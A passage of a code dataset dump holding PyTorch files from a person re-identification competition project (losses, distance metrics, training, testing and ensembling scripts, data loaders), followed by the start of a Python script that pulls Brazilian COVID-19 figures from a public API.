= torch.Tensor([alpha, 1 - alpha])\n\t\tif isinstance(alpha, list):\n\t\t\tself.alpha = torch.Tensor(alpha)\n\t\tself.size_average = size_average\n\t\tself.logsoftmax = nn.LogSoftmax(dim=1)\n\n\tdef forward(self, inputs, targets):\n\t\tif inputs.dim() > 2:\n\t\t\tinputs = inputs.view(inputs.size(0), inputs.size(1), -1) \t# N,C,H,W => N,C,H*W\n\t\t\tinputs = inputs.transpose(1, 2) \t\t\t\t\t\t\t# N,C,H*W => N,H*W,C\n\t\t\tinputs = inputs.contiguous().view(-1, inputs.size(2))\t\t# N,H*W,C => N*H*W,C\n\n\t\ttargets = targets.view(-1, 1)\n\n\t\tlogpt = self.logsoftmax(inputs)\n\t\tlogpt = logpt.gather(1, targets)\n\t\tlogpt = logpt.view(-1)\n\n\t\tpt = logpt.exp()\n\n\t\tif self.alpha is not None:\n\t\t\tif self.alpha.type() != inputs.data.type():\n\t\t\t\tself.alpha = self.alpha.type_as(inputs.data)\n\t\t\tat = self.alpha.gather(0, targets.data.view(-1))\n\t\t\tlogpt = logpt * at\n\n\t\t# compute weights by the number of each class\n\t\tbeta = 1.0 - 1.0 / np.array(self.samples_per_class)\n\t\teffective_num = 1.0 - np.power(beta, self.samples_per_class)\n\t\tweights = (1.0 - beta) / np.array(effective_num)\n\t\tweights = weights / np.sum(weights) * self.num_classes\n\n\t\tbatch_weights = torch.Tensor([weights[i] for i in targets]).cuda()\n\t\tloss = -1 * (1 - pt) ** self.gamma * batch_weights * logpt\n\n\t\tif 
self.size_average:\r\n\t\t\treturn loss.mean()\r\n\t\telse:\r\n\t\t\treturn loss.sum()\r\n\r\n\r\nclass RankedListLoss(nn.Module):\r\n\r\n\tdef __init__(self, margin=None, alpha=None, tval=None):\r\n\t\tsuper(RankedListLoss, self).__init__()\r\n\t\tself.margin = margin\r\n\t\tself.alpha = alpha\r\n\t\tself.tval = tval\r\n\r\n\tdef normalize_rank(self, x, axis=-1):\r\n\t\t\"\"\"\r\n\t\tNormalizing to unit length along the specified dimension.\r\n\t\tArgs:\r\n\t\t  x: pytorch Variable\r\n\t\tReturns:\r\n\t\t  x: pytorch Variable, same shape as input\r\n\t\t\"\"\"\r\n\t\tx = 1. * x / (torch.norm(x, 2, axis, keepdim=True).expand_as(x) + 1e-12)\r\n\t\treturn x\r\n\r\n\tdef euclidean_dist_rank(self, x, y):\r\n\t\t\"\"\"\r\n\t\tArgs:\r\n\t\t  x: pytorch Variable, with shape [m, d]\r\n\t\t  y: pytorch Variable, with shape [n, d]\r\n\t\tReturns:\r\n\t\t  dist: pytorch Variable, with shape [m, n]\r\n\t\t\"\"\"\r\n\t\tm, n = x.size(0), y.size(0)\r\n\t\txx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\r\n\t\tyy = torch.pow(y, 2).sum(1, keepdim=True).expand(n, m).t()\r\n\t\tdist = xx + yy\r\n\t\tdist.addmm_(1, -2, x, y.t())\r\n\t\tdist = dist.clamp(min=1e-12).sqrt()  # for numerical stability\r\n\t\treturn dist\r\n\r\n\tdef rank_loss(self, dist_mat, labels, margin, alpha, tval):\r\n\t\t\"\"\"\r\n\t\tArgs:\r\n\t\t  dist_mat: pytorch Variable, pairwise distance between samples, shape [N, N]\r\n\t\t  labels: pytorch LongTensor, with shape [N]\r\n\t\t\"\"\"\r\n\t\tassert len(dist_mat.size()) == 2\r\n\t\tassert dist_mat.size(0) == dist_mat.size(1)\r\n\t\tN = dist_mat.size(0)\r\n\r\n\t\ttotal_loss = 0.0\r\n\t\tfor ind in range(N):\r\n\t\t\tis_pos = labels.eq(labels[ind])\r\n\t\t\tis_pos[ind] = 0\r\n\t\t\tis_neg = labels.ne(labels[ind])\r\n\r\n\t\t\tdist_ap = dist_mat[ind][is_pos]\r\n\t\t\tdist_an = dist_mat[ind][is_neg]\r\n\r\n\t\t\tap_is_pos = torch.clamp(torch.add(dist_ap, margin - alpha), min=0.0)\r\n\t\t\tap_pos_num = ap_is_pos.size(0) + 1e-5\r\n\t\t\tap_pos_val_sum = torch.sum(ap_is_pos)\r\n\t\t\tloss_ap = torch.div(ap_pos_val_sum, float(ap_pos_num))\r\n\r\n\t\t\tan_is_pos = torch.lt(dist_an, alpha)\r\n\t\t\tan_less_alpha = dist_an[an_is_pos]\r\n\t\t\tan_weight = torch.exp(tval * (-1 * an_less_alpha + alpha))\r\n\t\t\tan_weight_sum = torch.sum(an_weight) + 1e-5\r\n\t\t\tan_dist_lm = alpha - an_less_alpha\r\n\t\t\tan_ln_sum = torch.sum(torch.mul(an_dist_lm, an_weight))\r\n\t\t\tloss_an = torch.div(an_ln_sum, an_weight_sum)\r\n\r\n\t\t\ttotal_loss = total_loss + loss_ap + loss_an\r\n\t\ttotal_loss = total_loss * 1.0 / N\r\n\t\treturn total_loss\r\n\r\n\tdef __call__(self, global_feat, labels, normalize_feature=True):\r\n\t\tif normalize_feature:\r\n\t\t\tglobal_feat = self.normalize_rank(global_feat, axis=-1)\r\n\t\tdist_mat = self.euclidean_dist_rank(global_feat, global_feat)\r\n\t\ttotal_loss = self.rank_loss(dist_mat, labels, self.margin, self.alpha, self.tval)\r\n\r\n\t\treturn total_loss" }, { "alpha_fraction": 0.5443037748336792, "alphanum_fraction": 0.5845800042152405, "avg_line_length": 22.13888931274414, "blob_id": "d06377896fb974a1a0168bd139bd352fbcea09db", "content_id": "1507c79c828a7c1275f1dc2901432250387fb216", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 869, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/tools/metric.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\r\n\r\n\r\ndef cosine_dist(x, y):\r\n\t'''\r\n\r\n\t:param x: numpy.ndarray, 2d\r\n\t:param y: numpy.ndarray, 2d\r\n\t:return: torch.tensor, 2d\r\n\t'''\r\n\tbs1 = x.shape[0]\r\n\tbs2 = y.shape[0]\r\n\r\n\tfrac_up = torch.matmul(x, y.transpose(0, 1))\r\n\tfrac_down = (torch.sqrt(torch.sum(torch.pow(x, 
2), 1))).view(bs1, 1).repeat(1, bs2) * \\\r\n\t (torch.sqrt(torch.sum(torch.pow(y, 2), 1))).view(1, bs2).repeat(bs1, 1)\r\n\tcosine = frac_up / frac_down\r\n\r\n\treturn cosine\r\n\r\n\r\ndef euclidean_dist(x, y):\r\n\t'''\r\n\r\n\t:param x: numpy.ndarray, 2d\r\n\t:param y: numpy.ndarray, 2d\r\n\t:return: torch.tensor, 2d\r\n\t'''\r\n\tm, n = x.shape[0], y.shape[0]\r\n\txx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\r\n\tyy = torch.pow(y, 2).sum(1, keepdim=True).expand(n, m).t()\r\n\tdist = xx + yy\r\n\tdist.addmm_(1, -2, x, y.t())\r\n\tdist = dist.clamp(min=1e-12).sqrt() # for numerical stability\r\n\t\r\n\treturn dist\r\n" }, { "alpha_fraction": 0.6639566421508789, "alphanum_fraction": 0.6789849996566772, "avg_line_length": 33.295650482177734, "blob_id": "57b71058a4f8f0457eafcdc186643bb7aa9a8632", "content_id": "3c3961cc8c89eef12aec20fc856f69fba3f7ce5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4059, "license_type": "no_license", "max_line_length": 117, "num_lines": 115, "path": "/main.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import argparse\r\nimport os\r\nimport ast\r\nfrom core import Loaders, Base, train_an_epoch, test, ensemble\r\nfrom tools import make_dirs, Logger, os_walk, time_now\r\n\r\n\r\ndef main(config):\r\n\r\n\t# init loaders and base\r\n\tloaders = Loaders(config)\r\n\tbase = Base(config, loaders)\r\n\r\n\t# make directions\r\n\tmake_dirs(base.output_path)\r\n\tmake_dirs(base.save_dist_path)\r\n\tmake_dirs(base.save_json_path)\r\n\tmake_dirs(base.save_model_path)\r\n\tmake_dirs(base.save_log_path)\r\n\r\n\t# init logger\r\n\tlogger = Logger(os.path.join(os.path.join(os.path.join(config.output_path, config.model_name), 'logs/'), 'log.txt'))\r\n\tlogger('\\n')\r\n\tlogger(config)\r\n\r\n\t# train mode\r\n\tif config.mode == 'train':\r\n\r\n\t\t# resume model from the resume_train_epoch\r\n\t\tif config.resume_train_epoch >= 0:\r\n\t\t\tbase.resume_model(config.resume_train_epoch)\r\n\t\t\tstart_train_epoch = config.resume_train_epoch\r\n\t\telse:\r\n\t\t\tstart_train_epoch = 0\r\n\r\n\t\t# automatically resume model from the latest one\r\n\t\tif config.auto_resume_training_from_lastest_steps:\r\n\t\t\troot, _, files = os_walk(base.save_model_path)\r\n\t\t\tif len(files) > 0:\r\n\t\t\t\t# get indexes of saved models\r\n\t\t\t\tindexes = []\r\n\t\t\t\tfor file in files:\r\n\t\t\t\t\tindexes.append(int(file.replace('.pkl', '').split('_')[-1]))\r\n\t\t\t\tindexes = sorted(list(set(indexes)), reverse=False)\r\n\t\t\t\t# resume model from the latest model\r\n\t\t\t\tbase.resume_model(indexes[-1])\r\n\t\t\t\tstart_train_epoch = indexes[-1]\r\n\t\t\t\tlogger('Time: {}, automatically resume training from the latest step (model {})'.format(time_now(), indexes[-1]))\r\n\r\n\t\t# main loop\r\n\t\tfor current_epoch in range(start_train_epoch, config.total_train_epochs):\r\n\r\n\t\t\t# save model\r\n\t\t\tbase.save_model(current_epoch)\r\n\r\n\t\t\t# train\r\n\t\t\tbase.lr_scheduler.step(current_epoch)\r\n\t\t\t_, results = train_an_epoch(config, base, loaders)\r\n\t\t\tlogger('Time: {}; Epoch: {}; {}'.format(time_now(), current_epoch, results))\r\n\r\n\r\n\t# test mode\r\n\telif config.mode == 'test':\r\n\t\t# resume from the resume_test_epoch\r\n\t\tif config.resume_test_epoch >= 0:\r\n\t\t\tbase.resume_model(config.resume_test_epoch)\r\n\r\n\t\ttest(config, base, loaders)\r\n\r\n\r\n\t# ensemble mode\r\n\telif config.mode == 'ensemble':\r\n\r\n\t\tensemble(config, base, 
loaders)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tparser = argparse.ArgumentParser()\r\n\r\n\t# overall configuration\r\n\tparser.add_argument('--cuda', type=str, default='cuda')\r\n\tparser.add_argument('--mode', type=str, default='train', help='train, test or ensemble')\r\n\tparser.add_argument('--output_path', type=str, default='output', help='path to save models')\r\n\tparser.add_argument('--model_name', type=str, default='resnet101a_SA',\r\n\t\t\t\t\t\thelp='densenet161_CBL, resnet101a_RLL or resnet101a_SA')\r\n\r\n\t# dataset configuration\r\n\tparser.add_argument('--dataset_path', type=str, default='dataset')\r\n\tparser.add_argument('--image_size', type=int, nargs='+', default=[256, 128])\r\n\tparser.add_argument('--p', type=int, default=16, help='persons count in a batch')\r\n\tparser.add_argument('--k', type=int, default=4, help='images count of a person in a batch')\r\n\r\n\t# model configuration\r\n\tparser.add_argument('--pid_num', type=int, default=4768, help='labels count of train set')\r\n\tparser.add_argument('--margin', type=float, default=0.3, help='margin for the triplet loss with batch hard')\r\n\r\n\t# train configuration\r\n\tparser.add_argument('--milestones', nargs='+', type=int, default=[40, 70],\r\n\t\t\t\t\t\thelp='milestones for the learning rate decay')\r\n\tparser.add_argument('--base_learning_rate', type=float, default=0.00035)\r\n\tparser.add_argument('--weight_decay', type=float, default=0.0005)\r\n\tparser.add_argument('--resume_train_epoch', type=int, default=-1, help='-1 for no resuming')\r\n\tparser.add_argument('--total_train_epochs', type=int, default=120)\r\n\tparser.add_argument('--auto_resume_training_from_lastest_steps', type=ast.literal_eval, default=True)\r\n\tparser.add_argument('--max_save_model_num', type=int, default=1, help='0 for max num is infinit')\r\n\r\n\t# test configuration\r\n\tparser.add_argument('--resume_test_epoch', type=int, default=119, help='-1 for no resuming')\r\n\r\n\r\n\t# main\r\n\tconfig = parser.parse_args()\r\n\tmain(config)\r\n" }, { "alpha_fraction": 0.7295082211494446, "alphanum_fraction": 0.7950819730758667, "avg_line_length": 60, "blob_id": "b799569329766130ff20969cf8667fd6544284f6", "content_id": "d3db4d3d5f2a6f579ec1eba5a3ad5ab163d2330f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 61, "num_lines": 2, "path": "/core/pretrained/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download pretrained models from the following url: \n链接: https://pan.baidu.com/s/1935MdSvnS1t6qo9TH-nXcQ 提取码: jk3d\n" }, { "alpha_fraction": 0.6617850065231323, "alphanum_fraction": 0.6722851395606995, "avg_line_length": 28.41176414489746, "blob_id": "2885ff669a5ba6f48eb0e2c4bf185d0d714d47f7", "content_id": "ee08fccce6cef7271af27245deb05786d86a5aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3619, "license_type": "no_license", "max_line_length": 110, "num_lines": 119, "path": "/core/test.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import os\r\nimport torch\r\nimport numpy as np\r\nfrom tools import CatMeter, cosine_dist, euclidean_dist, re_ranking\r\n\r\n\r\ndef generate_jsonfile(config, base, distmat, dataset, topk, json_name):\r\n\t\"\"\"\r\n\tArgs:\r\n\t\tdistmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\r\n\t\tdataset (tuple): a 2-tuple 
containing (query, gallery), each of which contains tuples of (img_path(s), pid).\r\n\t\ttopk: return topk ranks.\r\n\t\"\"\"\r\n\r\n\tnum_q, num_g = distmat.shape\r\n\tindices = np.argsort(distmat, axis=1)\r\n\r\n\tquery, gallery = dataset\r\n\tassert num_q == len(query)\r\n\tassert num_g == len(gallery)\r\n\r\n\tprint('Compute result with top-{} ranks'.format(topk))\r\n\tprint('# query: {}\\n# gallery {}'.format(num_q, num_g))\r\n\r\n\tresult_dict = {}\r\n\tqlist = []\r\n\r\n\tfor q_idx in range(num_q):\r\n\t\tqimg_path, qpid = query[q_idx]\r\n\t\tquery_name = qimg_path.replace(os.path.join(config.dataset_path, 'query_b/'), '')\r\n\r\n\t\tg_num = 0\r\n\t\tglist = []\r\n\t\tglist.append(query_name)\r\n\t\tfor g_idx in indices[q_idx, :]:\r\n\t\t\tgimg_path, gpid = gallery[g_idx]\r\n\t\t\tgallery_name = gimg_path.replace(os.path.join(config.dataset_path, 'gallery_b/'), '')\r\n\r\n\t\t\tif g_num < topk:\r\n\t\t\t\tglist.append(gallery_name)\r\n\t\t\tg_num += 1\r\n\t\tqlist.append(glist)\r\n\r\n\tfor i in range(len(qlist)):\r\n\t\tfor j in range(1, len(qlist[i])):\r\n\t\t\tresult_dict.setdefault(qlist[i][0], []).append(qlist[i][j])\r\n\r\n\t# generate json\r\n\timport json\r\n\r\n\tjson_str = json.dumps(result_dict)\r\n\tjsonfile = json_name + '.json'\r\n\r\n\twith open(os.path.join(base.save_json_path, jsonfile), 'w') as f:\r\n\t\tf.write(json_str)\r\n\r\n\tprint(\"Successfully generated jsonfile: {}\".format(jsonfile))\r\n\r\n\r\ndef test(config, base, loaders):\r\n\r\n\tbase.set_eval()\r\n\r\n\t# meters\r\n\tquery_features_meter, gallery_features_meter = CatMeter(), CatMeter()\r\n\r\n\t# init dataset\r\n\t_datasets = [loaders.comp_query_samples.samples, loaders.comp_gallery_samples.samples]\r\n\t_loaders = [loaders.comp_query_loader, loaders.comp_gallery_loader]\r\n\r\n\t# compute query and gallery features\r\n\twith torch.no_grad():\r\n\t\tfor loader_id, loader in enumerate(_loaders):\r\n\t\t\tfor data in loader:\r\n\t\t\t\t# compute features\r\n\t\t\t\timages, _ = data\r\n\r\n\t\t\t\tif config.model_name == 'resnet101a_SA':\r\n\t\t\t\t\tfeatures, _ = base.model(images)\r\n\t\t\t\telse:\r\n\t\t\t\t\tfeatures = base.model(images)\r\n\r\n\t\t\t\t# save as query features\r\n\t\t\t\tif loader_id == 0:\r\n\t\t\t\t\tquery_features_meter.update(features.data)\r\n\t\t\t\t# save as gallery features\r\n\t\t\t\telif loader_id == 1:\r\n\t\t\t\t\tgallery_features_meter.update(features.data)\r\n\r\n\t# get torch.Tensor\r\n\tquery_features = query_features_meter.get_val()\r\n\tgallery_features = gallery_features_meter.get_val()\r\n\r\n\t# compute distance: cosine, euclidean distance or re-ranking\r\n\t# distance = -cosine_dist(query_features, gallery_features).data.cpu().numpy()\r\n\t# distance = euclidean_dist(query_features, gallery_features).data.cpu().numpy()\r\n\tdistance = re_ranking(query_features, gallery_features)\r\n\r\n\tnp.save(os.path.join(base.save_dist_path, config.model_name + '.npy'), distance)\r\n\r\n\t# generate submission file containing top-200 ranks\r\n\tgenerate_jsonfile(config, base, distance, _datasets, 200, config.model_name)\r\n\r\n\r\ndef ensemble(config, base, loaders):\r\n\r\n\tbase.set_eval()\r\n\r\n\t# init dataset\r\n\t_datasets = [loaders.comp_query_samples.samples, loaders.comp_gallery_samples.samples]\r\n\r\n\t# test_set B\r\n\tdist1 = np.load(os.path.join(base.save_dist_path, 'densenet161_CBL.npy'))\r\n\tdist2 = np.load(os.path.join(base.save_dist_path, 'resnet101a_RLL.npy'))\r\n\tdist3 = np.load(os.path.join(base.save_dist_path, 'resnet101a_SA.npy'))\r\n\r\n\tensemble_dist = 
dist1 + dist2 + 0.48 * dist3\r\n\r\n\tgenerate_jsonfile(config, base, ensemble_dist, _datasets, 200, 'ensemble')\r\n" }, { "alpha_fraction": 0.6219419836997986, "alphanum_fraction": 0.6418663263320923, "avg_line_length": 34.71171188354492, "blob_id": "229373922c30b588d0166edab772cf2aa96310ea", "content_id": "5a53789bf0a170e6781d521b3a5833b8ee09099c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3965, "license_type": "no_license", "max_line_length": 118, "num_lines": 111, "path": "/core/data_loader/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('../')\n\nimport torchvision.transforms as transforms\nfrom .dataset import *\nfrom .loader import *\nfrom tools import *\n\n\nclass Loaders:\n\n def __init__(self, config):\n\n self.transform_train = transforms.Compose([\n transforms.Resize(config.image_size, interpolation=3),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.Pad(10),\n transforms.RandomCrop(config.image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n RandomErasing(probability=0.5, mean=[0.485, 0.456, 0.406])\n ])\n \n self.transform_test = transforms.Compose([\n transforms.Resize(config.image_size, interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n # dataset\n self.dataset_path = config.dataset_path\n\n # batch size\n self.p = config.p\n self.k = config.k\n\n # dataset paths\n self.samples_path = {\n 'comp_train': os.path.join(self.dataset_path, 'train_set/'),\n 'comp_test_query': os.path.join(self.dataset_path, 'query_b/'),\n 'comp_test_gallery': os.path.join(self.dataset_path, 'gallery_b/')}\n\n # label path\n self.label_path = os.path.join(self.dataset_path, 'train_list.txt')\n\n # load\n self._load()\n\n\n def _load(self):\n\n # train dataset and iter\n train_samples, self.num_train, self.samples_per_class = self._get_train_samples('comp_train', self.label_path)\n self.train_iter = self._get_uniform_iter(train_samples, self.transform_train, self.p, self.k)\n\n # test dataset and loader\n self.comp_query_samples, self.comp_gallery_samples = self._get_test_samples('comp_test')\n self.comp_query_loader = self._get_loader(self.comp_query_samples, self.transform_test, 128)\n self.comp_gallery_loader = self._get_loader(self.comp_gallery_samples, self.transform_test, 128)\n\n\n def _get_train_samples(self, train_dataset, label_path):\n\n train_samples_path = self.samples_path[train_dataset]\n samples = Comp_Train_Samples(train_samples_path, label_path)\n\n return samples, samples.num_train, samples.samples_per_class\n\n\n def _get_test_samples(self, test_dataset):\n\n query_data_path = self.samples_path[test_dataset + '_query']\n gallery_data_path = self.samples_path[test_dataset + '_gallery']\n\n query_samples = Comp_Test_Samples(query_data_path, reorder=False)\n gallery_samples = Comp_Test_Samples(gallery_data_path, reorder=False)\n\n return query_samples, gallery_samples\n\n\n def _get_uniform_iter(self, samples, transform, p, k):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=p * k, num_workers=8, drop_last=False,\n sampler=ClassUniformlySampler(dataset, class_position=1, k=k))\n iters = IterLoader(loader)\n\n return iters\n\n\n def _get_random_iter(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, 
transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=True)\n iters = IterLoader(loader)\n\n return iters\n\n\n def _get_random_loader(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=True)\n return loader\n\n\n def _get_loader(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=False)\n return loader\n\n" }, { "alpha_fraction": 0.6661229133605957, "alphanum_fraction": 0.6813485622406006, "avg_line_length": 29.66666603088379, "blob_id": "80e491027ef78f91155b776adfcba2042685dc6e", "content_id": "c96fe9615b9de25b831202dfec19e0ba7d6cf011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "no_license", "max_line_length": 88, "num_lines": 60, "path": "/core/train.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\nfrom tools import *\n\n\ndef train_an_epoch(config, base, loaders):\n\n\tbase.set_train()\n\tmeter = MultiItemAverageMeter()\n\n\tbatch_size = config.p * config.k\n\tnum_batch = int(loaders.num_train / batch_size)\n\n\tfor _ in range(num_batch):\n\n\t\t# load a batch data\n\t\timgs, pids = loaders.train_iter.next_one()\n\t\timgs, pids = imgs.to(base.device), pids.to(base.device)\n\n\t\t# forward\n\t\t# features, cls_score = base.model(imgs, config.model_name)\n\t\tfeatures, cls_score = base.model(imgs)\n\n\t\t# CBL: use cb_loss and triplet_loss.\n\t\tif config.model_name == 'densenet161_CBL':\n\t\t\tide_loss = base.cb_criterion(cls_score, pids)\n\t\t\ttriplet_loss = base.triplet_criterion(features, features, features, pids, pids, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score, pids, [1])[0]\n\n\t\t# RLL: use ide_loss and ranked_list_loss.\n\t\telif config.model_name == 'resnet101a_RLL':\n\t\t\tide_loss = base.ide_criterion(cls_score, pids)\n\t\t\ttriplet_loss = base.ranked_criterion(features, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score, pids, [1])[0]\n\n\t\t# SA: use ide_loss and triplet_loss.\n\t\telif config.model_name == 'resnet101a_SA':\n\t\t\tide_loss1 = base.ide_criterion(cls_score[0], pids)\n\t\t\tide_loss2 = base.ide_criterion(cls_score[1], pids)\n\t\t\tide_loss3 = base.ide_criterion(cls_score[2], pids)\n\t\t\tide_loss4 = base.ide_criterion(cls_score[3], pids)\n\n\t\t\tide_loss = ide_loss1 + ide_loss2 + ide_loss3 + ide_loss4\n\t\t\ttriplet_loss = base.triplet_criterion(features, features, features, pids, pids, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score[3], pids, [1])[0]\n\n\t\t# optimize\n\t\tbase.optimizer.zero_grad()\n\t\tloss.backward()\n\t\tbase.optimizer.step()\n\n\t\t# record: ide_loss and triplet_loss\n\t\tmeter.update({'ide_loss': ide_loss, 'triplet_loss': triplet_loss, 'acc': acc})\n\n\treturn meter.get_val(), meter.get_str()" } ]
14
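The ensemble mode in core/test.py above fuses three per-model query-gallery distance matrices before ranking. Here is a small sketch of that fusion step in isolation; the 1 + 1 + 0.48 weights come from the code above, while the file paths and the explicit top-200 read-off are assumptions for illustration.

import numpy as np

dist_a = np.load("output/dists/densenet161_CBL.npy")  # each is (num_query, num_gallery)
dist_b = np.load("output/dists/resnet101a_RLL.npy")
dist_c = np.load("output/dists/resnet101a_SA.npy")

fused = dist_a + dist_b + 0.48 * dist_c       # weights taken from core/test.py's ensemble()
top200 = np.argsort(fused, axis=1)[:, :200]   # per query: gallery indices, best match first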
dbca-wa/proxmox-utils
https://github.com/dbca-wa/proxmox-utils
10eafed0cb93227fb3630d3a1a2419ee75c23b25
a31e8cb538c5954c8c9dc863a74b5d5b3fa0f949
dac51858681e1c41cacda209910141f789262d45
refs/heads/master
2020-03-18T16:06:39.379351
2018-06-19T05:18:28
2018-06-19T05:18:28
134,946,976
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5888888835906982, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 44, "blob_id": "472d9be14116f2d4e7dba81d44ad9728b0883b93", "content_id": "cd63a8499482ae6a97921bb8f80e3b737e12f63f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 90, "license_type": "no_license", "max_line_length": 77, "num_lines": 2, "path": "/trimsnapshots.sh", "repo_name": "dbca-wa/proxmox-utils", "src_encoding": "UTF-8", "text": "#!/bin/bash\nqm listsnapshot $1 | cut -f1 -d' ' | grep auto | xargs -n 1 qm delsnapshot $1\n" }, { "alpha_fraction": 0.5677808523178101, "alphanum_fraction": 0.5733519196510315, "avg_line_length": 50.238094329833984, "blob_id": "fb863950d1420e5178300d254f995621ccd8537c", "content_id": "79d64ac25ca711eef2b05a055de32ec7a64fa2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2154, "license_type": "no_license", "max_line_length": 125, "num_lines": 42, "path": "/snapshotvms", "repo_name": "dbca-wa/proxmox-utils", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport subprocess\nfrom datetime import datetime, timedelta\nfrom collections import namedtuple\n\n# Copy to /etc/cron.daily/snapshotvms on a proxmox cluster node\n# Needs to be run on a cluster, goes through each node and snapshots vms\nnodes = [row.split()[2] for row in subprocess.check_output([\"pvecm\", \"nodes\"]).decode(\"utf-8\").strip().split(\"\\n\")[3:]]\n\nfor node in nodes:\n vms = subprocess.check_output([\"ssh\", node, \"qm\", \"list\"]).decode(\"utf-8\").strip().split(\"\\n\")\n VMInfo = namedtuple(\"vminfo\", vms[0].strip().replace(\"(\", \"_\").replace(\")\", \"\").split())\n Snap = namedtuple(\"Snap\", [\"name\", \"parent\", \"desc\"])\n # date followed by 24hr time, with minutes truncated to disallow multiple snaps per hour\n timeformat = \"auto_%Y%m%d\" \n now = datetime.now()\n maxage = timedelta(days=7)\n\n for vm in vms[1:]:\n vm = VMInfo(*vm.strip().split())\n if vm.STATUS == \"running\":\n try:\n subprocess.check_call([\"ssh\", node, \"qm\", \"snapshot\", vm.VMID, now.strftime(timeformat)])\n except Exception as e:\n print(e)\n snapshots = subprocess.check_output([\"ssh\", node, \"qm\", \"listsnapshot\", vm.VMID]).decode(\"utf-8\").strip().split(\"\\n\")\n if snapshots and len(snapshots) > 1:\n snapshots.sort()\n for snap in snapshots:\n snap = Snap(*snap.strip().split()) \n try: snapdate = datetime.strptime(snap.name, timeformat)\n except Exception as e:\n print(e)\n continue # If name doesn't parse, it wasn't an automated snapshot, so just skip to next\n if now - snapdate > maxage: # delete snapshots older than maxage\n try:\n print(\"Deleting snapshot {}@{}\".format(vm.VMID, snap.name))\n subprocess.check_call([\"ssh\", node, \"qm\", \"delsnapshot\", vm.VMID, snap.name])\n except Exception as e:\n print(e)\n print(\"{} ({}) snapshots:\".format(vm.NAME, vm.VMID))\n subprocess.check_call([\"ssh\", node, \"qm\", \"listsnapshot\", vm.VMID])\n\n\n" } ]
2
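
A small worked example of the seven-day retention rule the snapshotvms script above applies, isolated from the qm calls; the snapshot name and the fixed "now" are invented for illustration.

from datetime import datetime, timedelta

timeformat = "auto_%Y%m%d"        # same naming scheme the script uses
maxage = timedelta(days=7)

name = "auto_20180610"            # hypothetical snapshot name
now = datetime(2018, 6, 19)       # hypothetical current time

snapdate = datetime.strptime(name, timeformat)
if now - snapdate > maxage:
    # the script would run: qm delsnapshot <vmid> auto_20180610
    print("stale by", (now - snapdate).days - maxage.days, "days; delete")
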
Viviansol/python-api
https://github.com/Viviansol/python-api
3680746b6fa426533448af8794a034e56962c738
0b5853034d64047ac3e99ab991fa63369051ed1e
0a5d28f4b7f3117d7d978ccab6fa53c3b8005a51
refs/heads/main
2023-07-17T20:42:22.200553
2021-08-23T18:53:32
2021-08-23T18:53:32
399,215,769
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5315614342689514, "alphanum_fraction": 0.5652951598167419, "avg_line_length": 12.715789794921875, "blob_id": "b84ba88669f65846bd150d04fe859889614d7ef4", "content_id": "c6b9b93fcf61571772dcbf5cb8271571715583c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3916, "license_type": "no_license", "max_line_length": 102, "num_lines": 285, "path": "/projeto-final.py", "repo_name": "Viviansol/python-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# projeto final\n\n\n# In[24]:\n\n\nimport requests as r\n\n\n# In[25]:\n\n\nurl = 'https://api.covid19api.com/dayone/country/brazil'\nresp = r.get(url)\n\n\n# In[26]:\n\n\nresp.status_code\n\n\n# In[27]:\n\n\nraw_data = resp.json()\n\n\n# In[28]:\n\n\nraw_data[0]\n\n\n# In[29]:\n\n\nfinal_data = []\nfor obs in raw_data:\n final_data.append([obs['Confirmed'], obs['Deaths'], obs['Recovered'], obs['Active'], obs['Date']])\n\n\n# 